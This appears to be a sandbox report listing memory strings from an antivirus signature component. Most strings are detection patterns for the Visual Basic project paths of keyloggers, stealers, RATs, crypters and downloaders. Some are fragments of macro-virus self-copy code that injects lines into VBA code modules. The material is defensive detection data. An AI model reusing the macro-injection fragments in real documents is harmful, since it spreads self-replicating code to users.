Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: D:\\.+\\.+fcx\\.+1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: J*\AD:\Master\ADWARA_NEW\bho\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: JE.+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 2sharK\Server\Projekt1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: ,Z:\a_new_dll\VIVAX.vbp]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: HMDCorP.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter]
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: ^Systema So as ipanema tem\INSTALL\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: J\MSLoad.VB.Keylogger.Project\DOWN.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: = NormalTemplate.VBProject.VBComponents(1).CodeModule
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: :\\Jhocko\\Loader\\Loader.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: .+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: H\Users\User\Desktop\hta\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: ^\ie.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: .+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: D:\\Setup\\Drivers\\Audio\\Installs_the_RealTek_AC_97_audio_driver\\WDM5630\\Documents\\Documents11\\Secret\\Basic\\Updated\\Dao chich\\final 007 spy\\.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: =8.+\\invasao\\aaaa_kit_trix\\NOVENBRO novo KIT GF.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)]
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: \TIOCARADEPENE\Proyecto1.vbp]
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\Apub\\Cyfjrvepg.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: 0MicroProCon\MicroCon.vbp
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp Binary or memory string: lgC:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: &Desktop\ery\ery.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: :5C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: :\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: 50.+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: bradesco.vbp
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: RF:\vb\VISUAL BASIC\VARIOS\teuer\Teuer.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: +&.+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: 6\NotPHP +RSRC SQlite\sm.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: Safety.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: .+\\invasao\\aaaa_kit_trix\\NOVENBRO novo KIT GF.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: 4\MicroProCon\SeconFile.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: 2-.+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: OJC:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: @*\AD:\Master\ADWARA_NEW\codec\Codec.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: 3.D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: ;6.+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: ~A*\AE:\ExeNew\ExeSyVbNew3\ExeSyVb\ExeClientOld360\ExeClient.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: \Revolta.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: 1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: \Sp-Binder\Extracter\SpBinderExtracter.vbp]
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: (\LOADER\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: .+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: H\EOF\Alfredo\Downloader\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: .+:\\HELLS.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: \sYs__Tem.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: .+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp Binary or memory string: *\AC:\Documents and Settings\tjasi\Desktop\Downloader\Stub\p.vbpd"URLDownloadToFile
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: '".+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: :5.+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: \WebCounter\Source\WebCounter.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \QQPop.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: .\LoardR0x\System NT.vbp
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.sln.|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: <iXato\PharOlniNe\Proyecto1.vbp]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: ,'.+:\\SoUrCe.*!\\.*SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: .)C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: Virus\lsass.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: UPD:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: \ffzefzefz.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: C:\\.*A.*\\B\\Base.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp Binary or memory string: sload.vbp
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: %.com\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: \triploader.vbpP
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: :\PassStealer 3.0\Projekt1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: bTOYANO\otros virusillos\shell32\devil shell32.vbp
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: @.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: E:\\.+\\2010\\baidu.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: C:\winapp.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: \ardCo011064.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: \WinSysFix_1.5.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: \po\Cdmator.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: .+:\\.*XXSourceXX\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: Z:\vir\vrz\vrz\screencapture\screenCpature.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: *z:\ultimate\casa.vbp]
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: :\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: \WebNav.vbp
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: A<C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: PharOlniNe\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: rypter\stub.vbp]
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: ,Neriopert\Kolidert.vbp]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: \Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\Documents and Settings\\User\\Desktop\\.*pia de.*fab\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: \Users\Jatz0r\Desktop\jajajaja\anarko\DRONES 3.0.b\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: 0Desktop\war\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: SN.+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: '"\\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: \W.+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\VAIO\\Desktop\\2012\\[a-zA-Z]+\\GbpSv.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: *\AD:\Software\Hacking Tools\DDOS tools\STRESS\BBHH-DoS\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: KeyBoardSpy.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: 50.+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: ao com erro\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 0FileEZ HTTP\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: .@*\AG:\NEW\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: \Program Files\Microsoft Visual Studio\VB98\VB Projects\Viruses\HDKP4\HDKP_4.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: D:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: D:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 4/.+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: B=C:\\Users\\.*\\Desktop\\.*\\Lite-Stub\\Obfuscated .*\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: P\AYO.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: .v2\Pagina\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: Lkey logger project\logger\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \update.vbp
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
